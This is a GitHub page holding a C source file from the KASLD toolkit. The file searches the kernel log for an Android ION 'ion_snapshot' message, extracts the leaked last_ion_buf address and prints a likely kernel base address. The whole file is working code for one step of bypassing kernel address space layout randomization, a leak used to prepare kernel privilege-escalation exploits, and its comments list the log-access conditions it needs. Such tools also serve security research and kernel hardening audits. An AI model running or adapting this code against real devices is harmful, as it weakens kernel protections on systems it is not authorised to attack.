-
Notifications
You must be signed in to change notification settings - Fork 45
/
dmesg_android_ion_snapshot.c
124 lines (100 loc) · 2.7 KB
/
dmesg_android_ion_snapshot.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
// This file is part of KASLD - https://github.com/bcoles/kasld
//
// Search kernel log for Android ION ion_snapshot map message which
// prints last_ion_buf symbol address:
//
// ion_snapshot: 0x7e9d0000 map to 0xe0907000 and copy to 0xc0e5d374
//
// Android ION drivers were removed in kernel v5.11-rc1.
//
// Requires:
// - kernel.dmesg_restrict = 0; or CAP_SYSLOG capabilities; or
// readable /var/log/dmesg.
//
// References:
// https://lwn.net/Articles/576966/
// https://lwn.net/Articles/565469/
// https://lwn.net/Articles/480055/
// https://elixir.bootlin.com/linux/v5.10.89/source/drivers/staging/android/ion
// ---
// <bcoles@gmail.com>
#define _GNU_SOURCE
#include "include/kasld.h"
#include "include/syslog.h"
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
unsigned long search_dmesg_ion_snapshot() {
char *addr_buf;
char *line_buf;
char *substr;
char *syslog;
char *endptr;
const char *needle1 = "ion_snapshot: ";
const char *needle2 = "and copy to 0x";
int size;
unsigned long addr = 0;
printf("[.] searching dmesg for '%s' ...\n", needle1);
if (mmap_syslog(&syslog, &size))
return 0;
substr = strstr(syslog, needle1);
if (substr == NULL)
return 0;
line_buf = strtok(substr, "\n");
if (line_buf == NULL)
return 0;
addr_buf = strstr(substr, needle2);
if (addr_buf == NULL)
return 0;
addr = strtoul(&addr_buf[strlen(needle2)], &endptr, 16);
if (addr >= KERNEL_BASE_MIN && addr <= KERNEL_BASE_MAX)
return addr;
return 0;
}
unsigned long search_dmesg_log_file_ion_snapshot() {
FILE *f;
char *endptr;
char *substr;
char *addr_buf;
char *line_buf;
const char *path = "/var/log/dmesg";
const char *needle1 = "ion_snapshot: ";
const char *needle2 = "and copy to 0x";
unsigned long addr = 0;
char buff[BUFSIZ];
printf("[.] searching %s for '%s' ...\n", path, needle1);
f = fopen(path, "rb");
if (f == NULL) {
perror("[-] fopen");
return 0;
}
while ((fgets(buff, BUFSIZ, f)) != NULL) {
substr = strstr(buff, needle1);
if (substr == NULL)
continue;
line_buf = strtok(substr, "\n");
if (line_buf == NULL)
break;
addr_buf = strstr(substr, needle2);
if (addr_buf == NULL)
break;
addr = strtoul(&addr_buf[strlen(needle2)], &endptr, 16);
if (addr >= KERNEL_BASE_MIN && addr <= KERNEL_BASE_MAX)
break;
}
fclose(f);
return addr;
}
int main() {
unsigned long addr = search_dmesg_ion_snapshot();
if (!addr)
addr = search_dmesg_log_file_ion_snapshot();
if (!addr)
return 1;
printf("leaked last_ion_buf: %lx\n", addr);
printf("possible kernel base: %lx\n", addr & -KERNEL_ALIGN);
return 0;
}